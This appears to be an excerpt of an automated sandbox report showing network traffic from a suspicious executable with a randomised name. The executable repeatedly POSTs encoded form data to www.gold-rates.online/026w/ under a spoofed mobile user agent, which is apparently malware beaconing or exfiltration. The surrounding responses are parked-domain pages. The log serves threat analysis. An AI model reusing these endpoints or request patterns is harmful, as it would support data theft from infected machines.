                                                                                                                                Data Raw: 32 35 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                                                                                                                Data Ascii: 2517<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.dpo-medicina.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:54:08.641231060 CET212INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                                                                                                                                Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.dpo-medici
                                                                                                                                Oct 29, 2024 16:54:08.641246080 CET1236INData Raw: 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 68 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0
                                                                                                                                Data Ascii: na.online</h1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_referenc
                                                                                                                                Oct 29, 2024 16:54:08.641261101 CET1236INData Raw: 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f
                                                                                                                                Data Ascii: ing__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none">
                                                                                                                                Oct 29, 2024 16:54:08.641284943 CET1236INData Raw: 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c
                                                                                                                                Data Ascii: on_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="
                                                                                                                                Oct 29, 2024 16:54:08.641299009 CET1236INData Raw: 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62
                                                                                                                                Data Ascii: -title_size_large-compact"> </strong><p class="b-text b-parking__promo-description"> &nbsp; &nbsp; </p><a
                                                                                                                                Oct 29, 2024 16:54:08.641314983 CET1236INData Raw: 6d 40 64 65 73 6b 74 6f 70 20 6c 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 6e 65 40 64 65 73 6b 74 6f 70 22 3e d0 a3 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 b8 d1 82 d0 b5 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d1 8b d0 b9 20
                                                                                                                                Data Ascii: m@desktop l-margin_bottom-none@desktop"> SSL- &nbsp; &nbsp;! , &nbsp;
                                                                                                                                Oct 29, 2024 16:54:08.641329050 CET1236INData Raw: 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 65 61 64 20 20 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                                                                                Data Ascii: ript = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand=' + Math.random() + '&callback
                                                                                                                                Oct 29, 2024 16:54:08.641345978 CET794INData Raw: 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69
                                                                                                                                Data Ascii: }</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (d


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.849709199.59.243.227805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:23.986207008 CET693OUTPOST /026w/ HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.gold-rates.online
                                                                                                                                Referer: http://www.gold-rates.online/026w/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 31 72 39 4c 47 67 42 54 66 37 43 47 55 6c 7a 55 47 37 6a 6a 37 73 79 4b 6d 32 46 4f 68 4e 75 7a 6e 54 50 44 62 36 52 38 62 6f 32 48 47 63 75 4e 72 32 58 51 69 33 2b 4a 68 54 6f 41 41 6d 4a 6d 6e 64 64 58 41 38 63 65 62 6f 65 61 41 50 6f 46 34 55 66 43 63 79 36 30 6e 35 6e 31 77 78 42 56 54 4f 51 57 6f 6e 38 4f 6f 43 67 52 78 6a 6c 56 41 70 53 4b 50 55 6f 66 6a 62 75 4a 37 54 43 55 75 68 54 4b 57 55 7a 4f 52 6c 57 74 6b 59 5a 42 57 57 36 43 77 74 2b 45 62 6b 65 46 66 71 5a 59 2b 76 36 55 6c 75 4f 47 64 48 36 58 2f 41 4e 49 58 4f 4d 6e 79 36 44 75 71 63 34 3d
                                                                                                                                Data Ascii: edD=oaImfau1/9zZ1r9LGgBTf7CGUlzUG7jj7syKm2FOhNuznTPDb6R8bo2HGcuNr2XQi3+JhToAAmJmnddXA8ceboeaAPoF4UfCcy60n5n1wxBVTOQWon8OoCgRxjlVApSKPUofjbuJ7TCUuhTKWUzORlWtkYZBWW6Cwt+EbkeFfqZY+v6UluOGdH6X/ANIXOMny6Duqc4=
                                                                                                                                Oct 29, 2024 16:54:24.627417088 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:23 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1138
                                                                                                                                x-request-id: 4e80aa95-fbc9-4637-83ba-4eb199ac806b
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==
                                                                                                                                set-cookie: parking_session=4e80aa95-fbc9-4637-83ba-4eb199ac806b; expires=Tue, 29 Oct 2024 16:09:24 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:54:24.627605915 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGU4MGFhOTUtZmJjOS00NjM3LTgzYmEtNGViMTk5YWM4MDZiIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.849710199.59.243.227805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:26.527187109 CET713OUTPOST /026w/ HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.gold-rates.online
                                                                                                                                Referer: http://www.gold-rates.online/026w/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 7a 4c 74 4c 45 44 5a 54 4c 72 43 46 62 46 7a 55 66 4c 6a 6e 37 73 2b 4b 6d 33 42 65 6d 2f 36 7a 70 52 58 44 4a 49 35 38 58 49 32 48 4f 38 75 55 76 32 58 66 69 33 6a 38 68 53 55 41 41 6d 4e 6d 6e 66 31 58 42 4d 67 66 4a 49 65 59 56 2f 6f 44 33 30 66 43 63 79 36 30 6e 35 7a 66 77 78 5a 56 53 2b 67 57 6f 47 38 42 32 79 67 53 38 7a 6c 56 4b 4a 53 57 50 55 6f 68 6a 5a 62 73 37 52 4b 55 75 6c 66 4b 57 6c 7a 50 59 6c 57 6a 35 6f 59 4e 56 56 58 35 70 2f 36 59 53 6e 6d 55 58 35 5a 48 2f 5a 4c 2b 2f 4d 47 41 65 48 53 38 2f 44 6c 2b 53 35 52 50 6f 5a 54 65 30 4c 75 74 35 36 4e 6d 76 32 62 6b 49 38 4f 74 71 61 31 66 4d 37 2b 6d
                                                                                                                                Data Ascii: edD=oaImfau1/9zZzLtLEDZTLrCFbFzUfLjn7s+Km3Bem/6zpRXDJI58XI2HO8uUv2Xfi3j8hSUAAmNmnf1XBMgfJIeYV/oD30fCcy60n5zfwxZVS+gWoG8B2ygS8zlVKJSWPUohjZbs7RKUulfKWlzPYlWj5oYNVVX5p/6YSnmUX5ZH/ZL+/MGAeHS8/Dl+S5RPoZTe0Lut56Nmv2bkI8Otqa1fM7+m
                                                                                                                                Oct 29, 2024 16:54:27.136584997 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:26 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1138
                                                                                                                                x-request-id: d0f44dc0-70f4-4e11-9d25-557e209ab35e
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==
                                                                                                                                set-cookie: parking_session=d0f44dc0-70f4-4e11-9d25-557e209ab35e; expires=Tue, 29 Oct 2024 16:09:27 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:54:27.136610031 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDBmNDRkYzAtNzBmNC00ZTExLTlkMjUtNTU3ZTIwOWFiMzVlIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.849711199.59.243.227805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:29.080543041 CET1730OUTPOST /026w/ HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.gold-rates.online
                                                                                                                                Referer: http://www.gold-rates.online/026w/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 7a 4c 74 4c 45 44 5a 54 4c 72 43 46 62 46 7a 55 66 4c 6a 6e 37 73 2b 4b 6d 33 42 65 6d 2f 43 7a 70 69 66 44 62 5a 35 38 55 49 32 48 53 73 75 4a 76 32 58 47 69 33 72 6e 68 53 5a 69 41 6b 46 6d 6e 38 4e 58 4a 66 34 66 51 34 65 59 4b 76 6f 47 34 55 65 41 63 79 71 34 6e 35 6a 66 77 78 5a 56 53 38 49 57 68 33 38 42 30 79 67 52 78 6a 6c 5a 41 70 53 79 50 51 45 78 6a 5a 66 57 37 68 71 55 75 46 50 4b 46 44 76 50 58 6c 57 32 36 6f 5a 51 56 56 62 6d 70 2f 58 6a 53 6d 53 2b 58 35 52 48 39 75 79 58 67 4f 79 61 4c 46 48 58 2b 55 31 44 63 59 46 2b 68 35 43 71 35 4b 2b 37 2f 64 39 30 67 56 6e 2f 4c 4d 37 53 78 63 64 35 41 74 33 79 38 46 38 41 6b 2f 65 54 56 71 34 58 72 47 32 49 66 30 4b 58 78 6f 32 2b 53 2b 6a 37 51 4a 6c 58 54 68 31 5a 61 56 61 46 4e 61 74 32 30 70 53 51 35 41 6c 54 4c 66 54 35 38 6e 74 45 75 31 6c 36 69 61 4b 2b 32 5a 54 76 38 36 53 41 74 32 32 38 49 38 56 35 57 2b 48 6b 57 59 78 55 6d 66 39 47 79 45 72 37 79 6e 32 47 41 59 62 35 75 6f 4c 4c 71 6a [TRUNCATED]
                                                                                                                                Data Ascii: edD=oaImfau1/9zZzLtLEDZTLrCFbFzUfLjn7s+Km3Bem/CzpifDbZ58UI2HSsuJv2XGi3rnhSZiAkFmn8NXJf4fQ4eYKvoG4UeAcyq4n5jfwxZVS8IWh38B0ygRxjlZApSyPQExjZfW7hqUuFPKFDvPXlW26oZQVVbmp/XjSmS+X5RH9uyXgOyaLFHX+U1DcYF+h5Cq5K+7/d90gVn/LM7Sxcd5At3y8F8Ak/eTVq4XrG2If0KXxo2+S+j7QJlXTh1ZaVaFNat20pSQ5AlTLfT58ntEu1l6iaK+2ZTv86SAt228I8V5W+HkWYxUmf9GyEr7yn2GAYb5uoLLqjofHZ/xK0gJTW+hmVVPbK20E1YQdena1E3OQ2rnez+fzWl23khtZUd8pzkVla3fFexui3M23sXtNPacs/lQIZnmK0Eo/ZqNRVWaLd2gawWsW55OaonYZWXoUldYFWLzLjwi4lMaaw5wviT1Dqm9OyfXZWcznbIILvF5hnpmOTA4ayC8o6d0sIPQEzZOzIL8yjVKWsi5Iewfa6yQbxiYNw7Kef3/ytIwB3pnhaTj5YXkdhw+bLimq4pRaNbXGv6Qs+1pF6dyfn1SgxhGApdfj7Wmax+NZ9oZ21QqRI6ej1mMDHDeMCATQuSPH1at6VOoSisPQU+E6FBn2/Ho4V067BqFP+jZLv4F+RJAeSSfxfCUr0+3/Tj0fGLWStk/r+SQ+5T7L+Iasyl6R6dsX77lU4DElPDsNFvEWZ0UNxikF9xD1IVDV/NzKvOaaXMzfKMR8kuM3E6KqAVmCJglyoGWHHld7bhTNWns8Sl5d/QwLvZeIOpjQjvUTsE9TPVe1z2ICt3eGtcTkTrk5SB7DUwRWexuAQxymPpA13v4ADKO80MvyV/N32xuGtxup5zfczJ0yLQVgnNpfhFx5+lRITu84jxL3FasabfJfoxhv5Dii5UYIeKnPBsPeH02tmzRRSJ/aLxg6+vlZXdP4aZMPIapR2tqE74tIGwshUF7 [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:54:29.775293112 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:28 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1138
                                                                                                                                x-request-id: 6cc9662f-02f8-4ef6-acf8-bd137c170662
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==
                                                                                                                                set-cookie: parking_session=6cc9662f-02f8-4ef6-acf8-bd137c170662; expires=Tue, 29 Oct 2024 16:09:29 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
